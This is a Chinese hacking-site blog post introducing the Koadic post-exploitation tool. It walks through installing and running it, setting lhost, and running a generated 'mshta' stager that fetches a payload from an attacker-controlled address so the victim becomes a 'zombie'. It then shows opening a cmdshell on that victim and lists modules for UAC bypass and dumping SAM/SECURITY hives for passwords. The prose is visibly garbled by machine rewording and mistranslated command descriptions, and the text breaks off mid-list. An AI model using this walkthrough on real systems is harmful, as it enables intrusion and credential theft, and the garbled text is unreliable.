Koadic渗透工具了解一下

Koadic渗透工具了解一下

入侵渗透hacker2019-06-05 12:59:5913744A+A-

在盆友的搏客上见到强烈推荐的这款专用工具Koadic,我触碰了之后发觉很非常好这个专用工具的强劲独到之处我认为就是说得到shell后的各种各样控制模块作用,我也自个写出去发送给大伙儿看看。

最先把新项目复制到当地:

新项目详细地址

https://github.Com/zerosum0x0/koadic.git

Koadic渗透工具了解一下 第1张

随后压解,要是你可以安裝到你特定的文件目录就先Cd到哪个文件目录在免费下载,我就是拷贝到那了,因此我压解。给出图

后渗入专用工具Koadic

 

Koadic渗透工具了解一下 第2张

Koadic渗透工具了解一下 第3张

运作koadic

Cd koadic-master/           //Cd到手机软件文件目录

sudo ./koadic          //用最高权限运作koadic

开启Koadic,显示信息必须设定的內容

图为指令给出

(koadic: sta/Js/mshta)# info     //

查询必须设定的內容

后渗入专用工具Koadic

查询专用工具应用协助

(koadic: sta/Js/mshta)# help

后渗入专用工具Koadic

巨头绕过我的汉语翻译,英文很渣并且是全靠觉得汉语翻译的(很艰辛,靠工作经验和百度翻译蒙)

(koadic: sta/Js/mshta)# help        //协助的含意

COMMAND     DESCRIPTION    指令    叙述

———   ————-

load        reloads all modules  //显示信息

info        shows the current module options//显示信息当今控制模块选择项。

use         switch To a different module//转换到不一样的控制模块

get         sets a variable For the current module//为当今控制模块设定1个自变量

jobs        shows info about jobs//显示信息相关工作中的信息内容

help        displays help info For a command//获得1个cmdshell

cmdshell    command shell To interact with a zombie// 指令 shell 与丧尸互交

kill        shows info about jobs//显示信息相关工作中的信息内容

listeners   shows info about stagers//提示信息的传输器荷载

exit        exits the program//撤出

zombies     lists hooked targets//显示信息全部丧尸应用程序

run         runs the current module//运作,和exploit一样

verbose     exits the program//撤出程序流程

进到主题风格 ,刚开始设定。听着是否心潮澎湃要向下看过,嘿嘿。我觉得没啥要讲的,你只必须get lhost

这一指令大伙儿应当都明白,就是说设定当地ip。

给出图

后渗入专用工具Koadic

特别注意看,他转化成了1个网站地址,

我觉得它是1个故意网站地址,里边装车了exploit

最终转化成的运用指令给出

mshta .com://192.168.0.105:9999/S8QoC

运用方式是放进cmd里边实行

给出图

后渗入专用工具Koadic

我觉得你可以看他弹出来了事件查看器我不知道为何,就是我打开的啊,

也将会会好奇心mshta代表什么意思,正解给出

mshta.exe是微软公司Windows电脑操作系统有关程序流程,用以实行.HTA文档

我想要就这样运用的吧

那麼当总体目标服务器运作这一指令的那时候,人们这里就反跳回家了应用程序 应用程序Id为0

给出图

后渗入专用工具Koadic

 

要是是用别的拷贝大批量实行了这一指令,应用程序较为多得话能够实行zombies来查询上下应用程序,并挑选Id开展操纵

随后假如这儿想获得1个cmdshell得话,方式给出

cmdshell Id

我这儿应当是  cmdshell 0

给出图

后渗入专用工具Koadic

或许这怎能算是上功能强大的后渗入呢,这怎能考虑大伙儿呢

请相信我,上边仅仅一般实际操作,一般实际操作,说白了后渗入,在下边,

慢慢看嘛,这一后渗入专用工具最该入选的缘故我觉得有几个

1.自然环境规定不高

2.实际操作非常简单

3.出示的后渗入控制模块很好用丰富多彩

后渗入控制模块我不一个个讲了,设定都非常简单

我关键给你说一下下姓名

Hooks a zombie

Elevates integrity (UAC Bypass)

Dumps SAM/SECURITY hive For passwords

Scans local network For


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 野欢怙棘2022-06-04 05:11:00
  • 电脑操作系统有关程序流程,用以实行.HTA文档我想要就这样运用的吧那麼当总体目标服务器运作这一指令的那时候,人们这里就反跳回家了应用程序 应用程序Id为0给出图后渗入专用工具
  • 泪灼云胡2022-06-04 08:05:51
  • 当地ip。给出图后渗入专用工具Koadic特别注意看,他转化成了1个网站地址,我觉得它是1个故意网站地址,里边装车了exploit最终转化成的运用指令给出mshta .com://192.168.0.105:9999/S8QoC运用方式是放进
  • 南殷闻枯2022-06-04 12:52:35
  • 相信我,上边仅仅一般实际操作,一般实际操作,说白了后渗入,在下边,慢慢看嘛,这一后渗入专用工具最该入选的缘故我觉得有几个1.自然环境规定不高2.实际操作非常简单3.出示的后渗
  • 辞眸婉绾2022-06-04 10:35:06
  •    exits the program//撤出程序流程进到主题风格 ,刚开始设定。听着是否心潮澎湃要向下看过,嘿嘿。我觉得没啥要讲的,你只必须get lhost这一指令大伙儿应当都明白,就是说设定当地ip。给出图后渗入专用工具Koadic特

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理